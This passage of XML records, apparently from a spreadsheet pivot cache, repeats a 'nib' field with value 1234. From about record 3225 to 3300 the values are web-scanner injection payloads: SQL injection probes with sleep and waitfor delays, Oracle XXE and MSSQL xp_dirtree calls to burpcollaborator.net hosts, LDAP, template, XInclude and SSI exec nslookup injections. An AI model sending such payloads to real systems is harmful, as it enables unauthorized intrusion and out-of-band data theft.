    <x v="3072"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3073"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3074"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3075"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3076"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3077"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3078"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3079"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3080"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3081"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3082"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3083"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3084"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3085"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3086"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3087"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3088"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3089"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3090"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3091"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3092"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3093"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3094"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3095"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3096"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3097"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3098"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3099"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3100"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3101"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3102"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3103"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3104"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3105"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3106"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3107"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3108"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3109"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3110"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3111"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3112"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3113"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3114"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3115"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3116"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3117"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3118"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3119"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3120"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3121"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3122"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3123"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3124"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3125"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3126"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3127"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3128"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3129"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3130"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3131"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3132"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3133"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3134"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3135"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3136"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3137"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3138"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3139"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3140"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3141"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3142"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3143"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3144"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3145"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3146"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3147"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3148"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3149"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3150"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3151"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3152"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3153"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3154"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3155"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3156"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3157"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3158"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3159"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3160"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3161"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3162"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3163"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3164"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3165"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3166"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3167"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3168"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3169"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3170"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3171"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3172"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3173"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3174"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3175"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3176"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3177"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3178"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3179"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3180"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3181"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3182"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3183"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3184"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3185"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3186"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3187"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3188"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3189"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3190"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3191"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3192"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3193"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3194"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3195"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3196"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3197"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3198"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3199"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3200"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3201"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3202"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3203"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3204"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3205"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3206"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3207"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3208"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3209"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3210"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3211"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3212"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3213"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3214"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3215"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3216"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3217"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3218"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3219"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3220"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3221"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3222"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3223"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3224"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3225"/>
    <s v="nib"/>
    <s v="(select extractvalue(xmltype('&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;&amp;lt;!DOCTYPE root [ &amp;lt;!ENTITY % gyrlb SYSTEM &quot;http://aft0axd7ef8b5iny8un8hq4gq7w5kv8ywqjo7d.burpcollab'||'orator.net/&quot;&gt;%gyrlb;]&gt;'),'/l') from dual)"/>
  </r>
  <r>
    <x v="3226"/>
    <s v="nib"/>
    <s v="1234'||(select extractvalue(xmltype('&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;&amp;lt;!DOCTYPE root [ &amp;lt;!ENTITY % gyrlb SYSTEM &quot;http://0efq9ncxd57148mo7kmygg36pxvvjl7pvhif64.burpcollab'||'orator.net/&quot;&gt;%gyrlb;]&gt;'),'/l') from dual)||'"/>
  </r>
  <r>
    <x v="3227"/>
    <s v="nib"/>
    <s v="1234;declare @q varchar(99);set @q='\\\\c1e2wzz90hudrk90uw9a3sqic9i76xuokcczanz.burpcollab'+'orator.net\lig'; exec master.dbo.xp_dirtree @q;-- "/>
  </r>
  <r>
    <x v="3228"/>
    <s v="nib"/>
    <s v="1234';declare @q varchar(99);set @q='\\\\yuwoplsvt3nzk62mni2wwej45vbtzjnaey6l49t.burpcollab'+'orator.net\yxd'; exec master.dbo.xp_dirtree @q;-- "/>
  </r>
  <r>
    <x v="3229"/>
    <s v="nib"/>
    <s v="1234);declare @q varchar(99);set @q='\\\\7ltxguj4kce8bftvert5nnadw422qsej67yuwil.burpcollab'+'orator.net\kib'; exec master.dbo.xp_dirtree @q;-- "/>
  </r>
  <r>
    <x v="3230"/>
    <s v="nib"/>
    <s v="1234');declare @q varchar(99);set @q='\\\\4otujrm1n9h5ecwshow2qkdaz15ztphga42r0fp.burpcollab'+'orator.net\iyq'; exec master.dbo.xp_dirtree @q;-- "/>
  </r>
  <r>
    <x v="3231"/>
    <s v="nib"/>
    <s v="(select load_file&amp;#40;'\\\\2svsnpqzr7l3ia0qlm00uih83z9xxnlen2fpdd2.burpcollaborator.net\\che'&amp;#41;)"/>
  </r>
  <r>
    <x v="3232"/>
    <s v="nib"/>
    <s v="1234'+(select load_file&amp;#40;'\\\\f1h5w2zc0kugrn93uz9d3vqlccia60urxfp2nqc.burpcollaborator.net\\soo'&amp;#41;)+'"/>
  </r>
  <r>
    <x v="3233"/>
    <s v="nib"/>
    <s v="1234'"/>
  </r>
  <r>
    <x v="3234"/>
    <s v="nib"/>
    <s v="1234'"/>
  </r>
  <r>
    <x v="3235"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3236"/>
    <s v="nib"/>
    <s v="1234''"/>
  </r>
  <r>
    <x v="3237"/>
    <s v="nib"/>
    <s v="1234''"/>
  </r>
  <r>
    <x v="3238"/>
    <s v="nib"/>
    <s v="(select*from(select(sleep(20)))a)"/>
  </r>
  <r>
    <x v="3239"/>
    <s v="nib"/>
    <s v="1234+(select*from(select(sleep(20)))a)+"/>
  </r>
  <r>
    <x v="3240"/>
    <s v="nib"/>
    <s v="1234 and (select*from(select(sleep(20)))a)-- "/>
  </r>
  <r>
    <x v="3241"/>
    <s v="nib"/>
    <s v="1234 waitfor delay'0:0:20'--"/>
  </r>
  <r>
    <x v="3242"/>
    <s v="nib"/>
    <s v="1234)waitfor delay'0:0:20'--"/>
  </r>
  <r>
    <x v="3243"/>
    <s v="nib"/>
    <s v="1234,0)waitfor delay'0:0:20'--"/>
  </r>
  <r>
    <x v="3244"/>
    <s v="nib"/>
    <s v="123437996681 or 4089=04089"/>
  </r>
  <r>
    <x v="3245"/>
    <s v="nib"/>
    <s v="123422282077 or 8041=8047"/>
  </r>
  <r>
    <x v="3246"/>
    <s v="nib"/>
    <s v="123415849775 or 5569=5569"/>
  </r>
  <r>
    <x v="3247"/>
    <s v="nib"/>
    <s v="123431510365 or 8197=81970"/>
  </r>
  <r>
    <x v="3248"/>
    <s v="nib"/>
    <s v="123447431494 or 6256=06256-- "/>
  </r>
  <r>
    <x v="3249"/>
    <s v="nib"/>
    <s v="123499251105 or 8173=8177-- "/>
  </r>
  <r>
    <x v="3250"/>
    <s v="nib"/>
    <s v="123445327420 or 8894=8894-- "/>
  </r>
  <r>
    <x v="3251"/>
    <s v="nib"/>
    <s v="123422147480 or 7147=71470-- "/>
  </r>
  <r>
    <x v="3252"/>
    <s v="nib"/>
    <s v="1234 and 7396=07396"/>
  </r>
  <r>
    <x v="3253"/>
    <s v="nib"/>
    <s v="1234 and 3281=3289"/>
  </r>
  <r>
    <x v="3254"/>
    <s v="nib"/>
    <s v="1234 and 2531=2531"/>
  </r>
  <r>
    <x v="3255"/>
    <s v="nib"/>
    <s v="1234 and 3570=35700"/>
  </r>
  <r>
    <x v="3256"/>
    <s v="nib"/>
    <s v="1234 and 5281=05281-- "/>
  </r>
  <r>
    <x v="3257"/>
    <s v="nib"/>
    <s v="1234 and 9493=9495-- "/>
  </r>
  <r>
    <x v="3258"/>
    <s v="nib"/>
    <s v="1234 and 4296=4296-- "/>
  </r>
  <r>
    <x v="3259"/>
    <s v="nib"/>
    <s v="1234 and 6299=62990-- "/>
  </r>
  <r>
    <x v="3260"/>
    <s v="nib"/>
    <s v="123476474355' or '5298'='5298"/>
  </r>
  <r>
    <x v="3261"/>
    <s v="nib"/>
    <s v="123445741811' or '3545'='3550"/>
  </r>
  <r>
    <x v="3262"/>
    <s v="nib"/>
    <s v="123423036036' or '5824'='5824"/>
  </r>
  <r>
    <x v="3263"/>
    <s v="nib"/>
    <s v="123421484355' or '1587'='1587'"/>
  </r>
  <r>
    <x v="3264"/>
    <s v="nib"/>
    <s v="123478060984' or 5729=5729-- "/>
  </r>
  <r>
    <x v="3265"/>
    <s v="nib"/>
    <s v="123499495391' or 9273=9280-- "/>
  </r>
  <r>
    <x v="3266"/>
    <s v="nib"/>
    <s v="123485396650' or 4001=4001-- "/>
  </r>
  <r>
    <x v="3267"/>
    <s v="nib"/>
    <s v="123468452045' or 5600=5600'-- "/>
  </r>
  <r>
    <x v="3268"/>
    <s v="nib"/>
    <s v="1234' and '6195'='6195"/>
  </r>
  <r>
    <x v="3269"/>
    <s v="nib"/>
    <s v="1234' and '3217'='3225"/>
  </r>
  <r>
    <x v="3270"/>
    <s v="nib"/>
    <s v="1234' and '8230'='8230"/>
  </r>
  <r>
    <x v="3271"/>
    <s v="nib"/>
    <s v="1234' and '3990'='3990'"/>
  </r>
  <r>
    <x v="3272"/>
    <s v="nib"/>
    <s v="1234' and 9937=9937-- "/>
  </r>
  <r>
    <x v="3273"/>
    <s v="nib"/>
    <s v="1234' and 6972=6974-- "/>
  </r>
  <r>
    <x v="3274"/>
    <s v="nib"/>
    <s v="1234' and 3920=3920-- "/>
  </r>
  <r>
    <x v="3275"/>
    <s v="nib"/>
    <s v="1234' and 1112=1112'-- "/>
  </r>
  <r>
    <x v="3276"/>
    <s v="nib"/>
    <s v="1234&quot;"/>
  </r>
  <r>
    <x v="3277"/>
    <s v="nib"/>
    <s v="m9p7trt077"/>
  </r>
  <r>
    <x v="3278"/>
    <s v="nib"/>
    <s v="1234hv3cgodvx5"/>
  </r>
  <r>
    <x v="3279"/>
    <s v="nib"/>
    <s v="o26h7${391*348}iyu1d"/>
  </r>
  <r>
    <x v="3280"/>
    <s v="nib"/>
    <s v="xqwys{{302*921}}m0nzw"/>
  </r>
  <r>
    <x v="3281"/>
    <s v="nib"/>
    <s v="1234}}cqatx'/&quot;&amp;lt;pdqvg"/>
  </r>
  <r>
    <x v="3282"/>
    <s v="nib"/>
    <s v="1234%}n420h'/&quot;&amp;lt;n6ahq"/>
  </r>
  <r>
    <x v="3283"/>
    <s v="nib"/>
    <s v="1234l4rav%&gt;sh3et'/&quot;&amp;lt;wojh5"/>
  </r>
  <r>
    <x v="3284"/>
    <s v="nib"/>
    <s v="eval&amp;#40;compile('for x in range(1&amp;#41;:\n import time\n time.sleep(20)','a','single'))"/>
  </r>
  <r>
    <x v="3285"/>
    <s v="nib"/>
    <s v="wttmojrts1mxj41kmg1uvci24taryhm9a1xzlo.burpcollaborator.net"/>
  </r>
  <r>
    <x v="3286"/>
    <s v="nib"/>
    <s v="http://l7tb285i6q0mxtf905fj91wriiogc60woobmzb.burpcollaborator.net/?1234"/>
  </r>
  <r>
    <x v="3287"/>
    <s v="nib"/>
    <s v="3x4v7t33rn)(objectClass=*"/>
  </r>
  <r>
    <x v="3288"/>
    <s v="nib"/>
    <s v="jfskniakvh)(!(objectClass=*)"/>
  </r>
  <r>
    <x v="3289"/>
    <s v="nib"/>
    <s v="*)(objectClass=*"/>
  </r>
  <r>
    <x v="3290"/>
    <s v="nib"/>
    <s v="*)(!(objectClass=*)"/>
  </r>
  <r>
    <x v="3291"/>
    <s v="nib"/>
    <s v="&lt;rzq xss=removed xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xsi:schemaLocation=&quot;http://a.b/ http://378t2q506804xbfr0nf19jw9i0oyco0oogbez3.burpcollaborator.net/rzq.xsd&quot;&gt;rzq&lt;/rzq&gt;"/>
  </r>
  <r>
    <x v="3292"/>
    <s v="nib"/>
    <s v="&lt;upi xmlns:xi=&quot;http://www.w3.org/2001/XInclude&quot;&gt;&lt;xi href=&quot;http://bn21iyl8mggcdjvzgvv9prchy846swgx4prnfc.burpcollaborator.net/foo&quot;&gt;&lt;/upi&gt;"/>
  </r>
  <r>
    <x v="3293"/>
    <s v="nib"/>
    <s v="1234]]&gt;&gt;&lt;"/>
  </r>
  <r>
    <x v="3294"/>
    <s v="nib"/>
    <s v="(function(){if(typeof l5zot==='undefined'){var a=new Date();do{var b=new Date();}while(b-a&amp;lt;20000);l5zot=1;}}())"/>
  </r>
  <r>
    <x v="3295"/>
    <s v="nib"/>
    <s v="1234'+(function(){if(typeof ll3if===&quot;undefined&quot;){var a=new Date();do{var b=new Date();}while(b-a&amp;lt;20000);ll3if=1;}}())+'"/>
  </r>
  <r>
    <x v="3296"/>
    <s v="nib"/>
    <s v="&quot;--&amp;gt;'--&amp;gt;`--&amp;gt;&amp;lt;!--#set var=&quot;fgf&quot; value=&quot;efe4a1dbej&quot;--&amp;gt;&amp;lt;!--#set var=&quot;hih&quot; value=&quot;ghg6c3fdgl&quot;--&amp;gt;&amp;lt;!--#echo var=&quot;fgf&quot;--&amp;gt;&amp;lt;!--#echo var=&quot;hih&quot;--&amp;gt;&amp;lt;!--#exec cmd=&quot;nslookup -q=cname 121rxo0y16v2s9apvlaz4hr7dyjw7mvet2lpjd8.burpcollab"/>
  </r>
  <r>
    <x v="3297"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3298"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3299"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3300"/>
    <s v="nib"/>
    <s v="1234&gt;"/>
  </r>
  <r>
    <x v="3301"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3302"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3303"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3304"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3305"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3306"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3307"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3308"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3309"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3310"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3311"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3312"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3313"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3314"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3315"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3316"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3317"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3318"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3319"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3320"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3321"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3322"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3323"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3324"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3325"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3326"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3327"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3328"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3329"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3330"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3331"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3332"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3333"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3334"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3335"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3336"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3337"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3338"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3339"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3340"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3341"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3342"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3343"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3344"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3345"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3346"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3347"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3348"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3349"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3350"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3351"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3352"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3353"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3354"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3355"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3356"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3357"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3358"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3359"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3360"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3361"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3362"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3363"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3364"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3365"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3366"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3367"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="3368"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
